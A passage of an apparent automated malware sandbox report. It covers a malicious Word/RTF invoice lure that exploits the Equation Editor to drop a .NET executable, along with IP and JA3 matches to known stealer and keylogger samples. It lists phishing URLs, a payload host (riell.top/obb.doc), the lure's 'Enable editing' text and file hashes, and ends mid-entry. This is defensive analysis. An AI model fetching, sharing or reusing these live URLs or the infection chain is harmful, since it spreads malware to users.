            CLOUDFLARENETUShttps://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
            • 104.17.2.184
            Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            https://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
            • 104.17.2.184
            https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
            • 188.114.97.3
            http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
            • 188.114.97.3
            http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
            • 172.67.138.117
            http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousHTMLPhisherBrowse
            • 104.18.2.35
            http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
            • 104.26.8.44
            http://www.anuihafw369.xyz/m/register/Get hashmaliciousUnknownBrowse
            • 104.17.24.14
            https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoorsGet hashmaliciousHTMLPhisherBrowse
            • 104.18.2.35
            ORACLE-BMC-31898USCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            Contract.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.130.0
            1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 193.122.130.0
            IMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
            • 158.101.44.242
            payment.exeGet hashmaliciousSnake KeyloggerBrowse
            • 158.101.44.242
            FiddlerSetup.5.0.20243.10853-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
            • 192.29.11.142
            https://ssl.sonicsecuremail.com/r.aspx?b=8&e=pamela%2Ecase%40marionfl%2Eorg&p=4VEU&cb=181Get hashmaliciousUnknownBrowse
            • 192.29.14.118
            PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.6.168

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            05af1f5ca1b87cc9cc9b25185115607dswift_copy.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            • 188.114.96.3
            DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            • 188.114.96.3
            bodtfUNu8p.rtfGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            Payment receipt_1.docx.docGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            • 188.114.96.3
            Ship particulars.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            • 188.114.96.3
            Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            • 188.114.96.3
            7dcce5b76c8b17472d024758970a406bswift_copy.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            Payment receipt_1.docx.docGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            • 188.114.96.3
            Payment_Advice.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            SecuriteInfo.com.Exploit.CVE-2018-0798.4.30916.4690.rtfGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            statement .xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            • 188.114.96.3
            INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            • 188.114.96.3
            Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            • 188.114.96.3

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025397891105546227
            Encrypted:false
            SSDEEP:6:I3DPcRgbXRvxggLRBKXArpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQgbtVLvYg3J/
            MD5:0C55C56C4C801103228B2C7F616E7B30
            SHA1:6A169F3162ED2C81EA32A31BFC91E1699FCCD2D3
            SHA-256:66474E93FBB847138469757639D2B3A6995DE4D9AC6583322B3A789719485B97
            SHA-512:81BE2B9F275FFFDC5EBBB96758A355B89E6078F75858003BD77BFA17EFDAF78E6768F4F0ADFB4CBC9B4B6158D4135E5532B1E68B92DEB243690DE92DF2B7C843
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z]...3+bG...B....S,...X.F...Fa.q............................V.mg...C................N..Y..L.............................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Rich Text Format data, version 1
            Category:dropped
            Size (bytes):549151
            Entropy (8bit):3.7501066868878303
            Encrypted:false
            SSDEEP:6144:cGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuhSaV:ay
            MD5:3F9A089317AFA13A17B61D5E0F95B75E
            SHA1:F5129818D643FBA59BF77BC2785EEF2AF34DB679
            SHA-256:09CC281D7242AEDDD2DE25D63EF16E9B8D190BD06D31928410FDAEF1E5A5C351
            SHA-512:6A73233318865BD82C9A15887421A1197FEBFB88070216979BE9C04F97C9749DAE728FD75F3C4D372F4A7C0E834750E3AAC4422508BCBBC39D9EC82D9C1822C8
            Malicious:false
            Yara Hits:
            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, Author: ditekSHen
            Reputation:low
            Preview:{\rtf1..{\*\qGdJoyz5HXg76Q8inCR7sNt2WUiKSO8z6tYFzWA9JfeCvqEHRKwuax4htC20aUKwgpmWPY79qVgKoIVb1rVkQM2EvEgxBSB7qEpWsjrx}..{\619637961please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in ...accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of ...financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to ...plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial ...statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow ...errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the normal course of performing ...their duties. If the auditors dete

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr

            Download File
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):520704
            Entropy (8bit):7.363165773317466
            Encrypted:false
            SSDEEP:12288:NCHm2ADAAtm9M08jBCZ5pYYfa5LmgmvUetrtEDtr7ksXJs4CGSNkrzQaR0birorA:Nf7m608jBCZ5pYYfadmgmvBtrt6p7DeW
            MD5:F7BDADAFF67E573F145D2E8E32E32CD8
            SHA1:CFD1377D49E09ECFA842760DD9CC78CC17A34628
            SHA-256:FE80EEADE269CE2B6688E039296FC9E9743E24F881341ADAD24E220967312316
            SHA-512:25477C0A78D20A43C6CFA7819185C680566C20E6D0C7A65FFECBDDC91DF9BD91310B6368B849B6F8F6688D85A2C86E3C9AF1F68EC4358DEB3CC94A6473D3F4C6
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 58%
            • Antivirus: Virustotal, Detection: 51%, Browse
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:,...............0.................. ... ....@.. .......................`............@.................................l...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......|X.............0c..L...............................................( ) ....&.(1.....*".......*".(6....*Vs....(7...t.........*...}.....(8.....~5...tT...(9...&.(.....*..*.(.........*".s....&*.r...p.4...(Z...(%...o[...o\....#..5....(]....0...*....}3....(1.......{3....X.....}2...*z.(1.......}6.....}7.....}8...*z.()...-..(*...,.r...p.(c...*.*"..(+...*2~9....od...*..oe..../..*..of...._3...of...._3...of...._.....*.*..(i...*.~:...*.(/...,.r...p......%...%...(n...*..(o...*.(/

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Rich Text Format data, version 1
            Category:dropped
            Size (bytes):549151
            Entropy (8bit):3.7501066868878303
            Encrypted:false
            SSDEEP:6144:cGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuhSaV:ay
            MD5:3F9A089317AFA13A17B61D5E0F95B75E
            SHA1:F5129818D643FBA59BF77BC2785EEF2AF34DB679
            SHA-256:09CC281D7242AEDDD2DE25D63EF16E9B8D190BD06D31928410FDAEF1E5A5C351
            SHA-512:6A73233318865BD82C9A15887421A1197FEBFB88070216979BE9C04F97C9749DAE728FD75F3C4D372F4A7C0E834750E3AAC4422508BCBBC39D9EC82D9C1822C8
            Malicious:false
            Yara Hits:
            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, Author: ditekSHen
            Reputation:low
            Preview:{\rtf1..{\*\qGdJoyz5HXg76Q8inCR7sNt2WUiKSO8z6tYFzWA9JfeCvqEHRKwuax4htC20aUKwgpmWPY79qVgKoIVb1rVkQM2EvEgxBSB7qEpWsjrx}..{\619637961please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in ...accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of ...financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to ...plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial ...statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow ...errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the normal course of performing ...their duties. If the auditors dete

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):6144
            Entropy (8bit):4.075509083656481
            Encrypted:false
            SSDEEP:48:rQnUPMPGGRFVnlQPR6Da2DRhxlYL/oK+mSuRZchGvPO4cbp7+vXzlM5Z:00MPNRFcPR6+idxFvuRZYmPO4cbpSvS
            MD5:A216EBA76D3A09C00DEFC23ED7B80160
            SHA1:F86695B8AFE94D3C3157B290C8BF90EC3D0C61EC
            SHA-256:C215CB87322E43545144C1E06275BF92D734B194D74224A919E7C788ADAA2385
            SHA-512:174B07D0439FB1556C6216F26D3DCA05BE7EDCF9478F017FA84D49AE47DE656BF378E7CC6D43B0F6895F4C292A4C0E71137BBC6BB8953A6C6D06A69BAE5925E2
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{286F2A7E-F7F4-4D14-9522-7CD16AE70F3F}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1536
            Entropy (8bit):1.3568273340340575
            Encrypted:false
            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbd:IiiiiiiiiifdLloZQc8++lsJe1MzC
            MD5:437903A0DF2D0268D94F032D6F14F6F6
            SHA1:B414578A6BD6FC5753D65ECB8A3256E404ED2F2E
            SHA-256:04A59DC28E79D5892B72ED25915713826EDA3CE2896DB00103B7EFFBB6B8CE9E
            SHA-512:52FE14E56A41E054203530B3BD838F784F4A912308ABD3C70349C05804E697FF31B86851156441B6697F02FEF1A9850AF54DB430704908271FC91767488E68E0
            Malicious:false
            Reputation:low
            Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5CE991A5-ECDD-4D90-A7A9-1E0E273031B4}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):352800
            Entropy (8bit):3.4392549752819317
            Encrypted:false
            SSDEEP:6144:IyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeE:+
            MD5:D13213F6EBEA5B155B0351269FCEE000
            SHA1:1ACC77B634DC01BB1F63DD1121C13B24E68FA56D
            SHA-256:EE640E104E41FC682B4F137446D84FF12ECCA30E34DD5EC2D1DE00BF0A21D7D9
            SHA-512:F276FB4F1EE4CB36A10D6CC6D09585294A33B712B8DF7B0904B06CC940378010A450B52389DA37AC11E1B8E7BB18E10C0A3FFEC93DD5CECD8C44BDC902216233
            Malicious:false
            Preview:1.9.6.3.7.9.6.1.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{93BD778F-76C5-482F-AFE4-8C9D206A27D0}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):46874
            Entropy (8bit):3.551464186925344
            Encrypted:false
            SSDEEP:768:uaWvW5Kq2g0Zos0SCWiMuz1rqAyLt+eqViz9yCFcEhZVsft:FgemiDvwxKrK2ft
            MD5:AC7C710B6CA9D66ED9923D65C708B21B
            SHA1:756E2D7C42EF9BF05DA7EA871B077BB6DAFCD8E7
            SHA-256:C1BEA8318A21530E776F4E3336A3F5E8AFE04F52FBB44F254304A9F36C570B68
            SHA-512:B366139A262F47A8C38FC1B5E649F9529E5E89471FF34B543A484737F84C6AF7185AB363946BFBD17DB9BA6642D0CE5520BEA236693CA27E3AF123816809F65C
            Malicious:false
            Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt%~D.....d........gd%

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFDE4C25-701B-4F27-93CB-2693CC173C87}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\{C6E1DAFB-D5C3-4468-976B-7C1C547D1675}

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025397891105546227
            Encrypted:false
            SSDEEP:6:I3DPcRgbXRvxggLRBKXArpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQgbtVLvYg3J/
            MD5:0C55C56C4C801103228B2C7F616E7B30
            SHA1:6A169F3162ED2C81EA32A31BFC91E1699FCCD2D3
            SHA-256:66474E93FBB847138469757639D2B3A6995DE4D9AC6583322B3A789719485B97
            SHA-512:81BE2B9F275FFFDC5EBBB96758A355B89E6078F75858003BD77BFA17EFDAF78E6768F4F0ADFB4CBC9B4B6158D4135E5532B1E68B92DEB243690DE92DF2B7C843
            Malicious:false
            Preview:......M.eFy...z]...3+bG...B....S,...X.F...Fa.q............................V.mg...C................N..Y..L.............................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\{D1236A15-FCA5-4B0C-9CDB-9BBC48C1E16C}

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02552812248964551
            Encrypted:false
            SSDEEP:6:I3DPcONSHvxggLRz0c0D2LIX/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DP5APf0qLy/TvYg3J/
            MD5:AA0B5EE04C7BEBD3AEFAD29D2959A967
            SHA1:37A6501501DD3AD20A2B12437DCF5014BCC1611A
            SHA-256:39EA4E568D565CD60F6C85A04B0E979C11ADF35491D01873832798435728E83C
            SHA-512:AEBD5E041FD830AAF93A4FF7DFF18B6F2995532DD32A6D7F08BD9E51AABAF605464976CB620BC666650CC30348C996E98DAF8F7811F6DB92B4EF3398F81C35B3
            Malicious:false
            Preview:......M.eFy...z...[.D........S,...X.F...Fa.q............................dX..}T.I..:]...................O.T.V,........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\OVER DUE INVOICE PAYMENT.LNK

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Thu Jul 4 23:57:42 2024, length=16418, window=hide
            Category:dropped
            Size (bytes):1089
            Entropy (8bit):4.585525943373446
            Encrypted:false
            SSDEEP:24:8z//XT2nbkH5/Aj5CreOc8oeRej5CDv3qHhk7N:8j/XTkbQIj5Cre/j5xBiN
            MD5:68865068F3EBDC0C62772E890D46A287
            SHA1:A365121AC66EB6316A5541440EDBECBF7835E3CE
            SHA-256:F966A73FE5C60420267DA6EF3DFC31A6513E56D88EAF1D77E3670A05A4B010EE
            SHA-512:DF03B8C3192F4A93C255F39947D3580414F054B1569B30C3662CD79E6E57794C070CD4733C49EFE4B2AB60FD939F06B9BDFF42F54B67F2B14F1E91585A7FB220
            Malicious:false
            Preview:L..................F.... .....}.r.....}.r....msWv..."@...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X4...user.8......QK.X.X4.*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2."@...X6. .OVERDU~1.DOC..h.......WD..WD.*.........................O.V.E.R. .D.U.E. .I.N.V.O.I.C.E. .P.A.Y.M.E.N.T...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\065367\Users.user\Desktop\OVER DUE INVOICE PAYMENT.docx.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.V.E.R. .D.U.E. .I.N.V.O.I.C.E. .P.A.Y.M.E.N.T...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Generic INItialization configuration [folders]
            Category:dropped
            Size (bytes):122
            Entropy (8bit):5.028515002486535
            Encrypted:false
            SSDEEP:3:M1cr8Ax8XeGWrzXmgc8ogP2mxWhzAWrzXmgc8ogP2v:MiZxOS2gc8ogPwzAS2gc8ogPI
            MD5:BC18D82BDF61FA99A66688A09FADE946
            SHA1:18F8F710ABD1BF5A1B3614B7A577B5B3582AAF2F
            SHA-256:3B801759030D606570D43DBA1089F4C0D9DE3A6E048C85B39678FB74EA8A5191
            SHA-512:0F39EB37C75C280DF003A284283131A2942BEB957C3F1C7B3E1FA0D3C1D547054D28F11085412174625586B3B495DB31292BB27C383D8AB57EFD0D43F360275A
            Malicious:false
            Preview:[doc]..obb.doc.url=0..[folders]..riell.top.url=0..OVER DUE INVOICE PAYMENT.LNK=0..[misc]..OVER DUE INVOICE PAYMENT.LNK=0..

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.url

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows 95 Internet shortcut text (URL=<https://riell.top/obb.doc>), ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):51
            Entropy (8bit):4.497598930973582
            Encrypted:false
            SSDEEP:3:HRAbABGQYm2fkPUvn:HRYFVm4O2
            MD5:A085681EBB461A55BE28CF9AE262880E
            SHA1:2E53D304FB02FDF061F1DF2329C1876325364CBB
            SHA-256:578E2B190FC08307F49BE0F232310D0CA9746064ED878FE41A1734B3B532546D
            SHA-512:95DC721BC2533357C1D8AA15069BD22839A3BDF5AF45BCEAC86660DF719297B57F8745B091FEBED8B522F284A4C88BF7196B6781773BF71FA4759704C68C4DFF
            Malicious:true
            Preview:[InternetShortcut]..URL=https://riell.top/obb.doc..

            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.url

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows 95 Internet shortcut text (URL=<https://riell.top/>), ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):44
            Entropy (8bit):4.370428278616987
            Encrypted:false
            SSDEEP:3:HRAbABGQYm2fktv:HRYFVm4sv
            MD5:7C4B92A4C06A7AA3645579A99B8D83AE
            SHA1:30F8E7A48E68F04FABEDB17481970880081512D4
            SHA-256:126F147D79C43D1F127C372D0B09EB456576358A1B71AE46459F2D1F06161D8D
            SHA-512:1539D01AEEB001E2627C72177A76290227189B0C740334718C9644632E783581C6953C125606FAB5158ED14A9FAAB8228986AEE45EDC02FC3CA2C841E4F3F313
            Malicious:true
            Preview:[InternetShortcut]..URL=https://riell.top/..

            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.4797606462020307
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
            MD5:89AFCB26CA4D4A770472A95DF4A52BA8
            SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
            SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
            SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

            C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
            Category:dropped
            Size (bytes):2
            Entropy (8bit):1.0
            Encrypted:false
            SSDEEP:3:Qn:Qn
            MD5:F3B25701FE362EC84616A93A45CE9998
            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
            Malicious:false
            Preview:..

            C:\Users\user\AppData\Roaming\obi23456.scr

            Download File
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):520704
            Entropy (8bit):7.363165773317466
            Encrypted:false
            SSDEEP:12288:NCHm2ADAAtm9M08jBCZ5pYYfa5LmgmvUetrtEDtr7ksXJs4CGSNkrzQaR0birorA:Nf7m608jBCZ5pYYfadmgmvBtrt6p7DeW
            MD5:F7BDADAFF67E573F145D2E8E32E32CD8
            SHA1:CFD1377D49E09ECFA842760DD9CC78CC17A34628
            SHA-256:FE80EEADE269CE2B6688E039296FC9E9743E24F881341ADAD24E220967312316
            SHA-512:25477C0A78D20A43C6CFA7819185C680566C20E6D0C7A65FFECBDDC91DF9BD91310B6368B849B6F8F6688D85A2C86E3C9AF1F68EC4358DEB3CC94A6473D3F4C6
            Malicious:true
            Antivirus:
